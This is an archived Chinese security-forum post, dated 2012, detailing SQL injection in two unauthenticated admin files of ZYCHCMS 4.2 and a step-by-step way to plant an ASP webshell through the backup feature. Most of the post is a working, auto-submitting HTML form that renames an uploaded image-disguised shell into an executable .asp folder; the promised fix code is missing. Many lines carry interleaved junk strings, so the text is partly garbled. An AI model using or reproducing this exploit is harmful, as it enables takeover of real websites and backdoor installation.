找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1931|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% v8 ^7 Z' U1 a3 N6 _( _1 I) t" B
# q- Q* Y# t/ L# R; K4 J$ e
9 ]% u! l: C" p0 Q5 N2 v! H# q$ @  r% P$ ?) a% {& t
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
, Z) G; Y, w( V/ J0 w' ~0 ]6 X ①SQL注射漏洞
: L, J$ x$ v; H. E 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; @7 e1 H7 N. y2 `1 f 漏洞原因:未过滤5 @# c6 J0 K+ D) ?
漏洞代码:
/ F9 m: X6 z! h' `* J* Z7 _ 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
- v2 j% R& {# B& V. O 修复方法:在文件开头加入代码
+ [* k" T7 s$ P' H
$ p2 Z7 k: Q, ~6 y$ X
9 ]7 n. g( B5 n②后台拿WBSHELL' i" B- u  e* p1 n8 f4 [/ t
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。( ?3 }/ U) q! u- @& V
这里在网上找了一个,改了下,将就着用。
5 `' v, R8 ~) D 以下是代码本地提交代码# Y# Q( V* C9 `+ v+ e
0 ~! _& F' t6 T" e1 n+ X% ?
- s- F# q- c* z. I  }* ?4 e
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ ^' R  h0 Q/ [
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
- \2 o' h) d% @' `% u9 \* K* w <tr>
0 ~) ?1 {: G( i6 X <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>1 j/ m' L# l* O$ W: p! S1 Y; e+ M$ q
</tr>
4 z; N2 [4 u3 Z <tr>
4 f3 U4 f$ J: ` <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
& F$ K( D( R5 s% B) C: _# d2 L) N </span>, ^% q% U+ p. U& _
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >' ?/ p" n! a8 N" `) [: G0 N
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >9 R0 S- O4 K- N& g
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>/ q. z7 @# K! R! L  s$ q& @6 w
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d3 p8 v% V  ], F( y9 t- v4 s3 l3 H
<div align=”left”>
- g6 ~, a5 ~1 K: T7 w3 m <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />& f% [- C8 |/ C: o) F# H
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
% I; m% G) N3 j: _ <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />% \" f) V. a3 H+ z
</div></td>
9 O$ K: r' O% }% h# \ </tr>
+ F/ V) y+ L% t' }/ j <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”># i9 _  m: h: Q
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>" r0 j' J1 K. F. \/ [7 K
<td class=”td”><div align=”left”>& x9 e  u* n& s% \  S3 x# J# e
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />! e$ K, U  U& X- {( j3 y" K1 \7 S
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
& m2 ?# G& j" I. s </tr># z/ W* f5 [. R3 b5 }2 i6 F) h  D0 j
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>3 }% F% E3 m" y& ]
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
6 U+ ^! {# }6 d7 N8 e& U3 ~- W <td class=”td”><div align=”left”>: ^1 b8 R' P2 r; _( O9 M
<input type=”submit” value=”确定备份” class=”btn”0 [8 C7 ]. t3 z, N
</div></td>
) }( {5 s1 p2 U' ?4 y% Y </tr>
0 `/ L  ?/ W" U- O  }" D' c7 ^8 r </table></td></tr></form>
) z! j, X" a. y7 f! S </table>
# ?' ^2 R/ m- Z! J! H </td>
6 W$ Q) V8 w9 d# `! w! u# v; n% T </tr>( p. J; J- w  u, p9 v- H4 c0 M
</table>
9 q5 z9 @/ x& e: q' S <script>
  ]6 V, }" k6 z; F3 j7 @ document.all.add.submit();) T' J% S4 D  y4 \
</script>( _/ E" Z  ~# S& k& Z# d" P
+ o; e. g3 l" ^& W* f% j- V

4 K  O) P0 R% y  n
2 O6 a' s0 X) f  k5 q" R& g- ]" a. `. c

& E: S" j; ~7 W5 B! h* b+ Q. {7 i" W$ E
; o; \$ A3 x1 ~

& i$ Q$ K% h3 `4 X' E. E( Q' q3 [/ R- p5 b
/ N1 B$ W+ H: P) E! V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表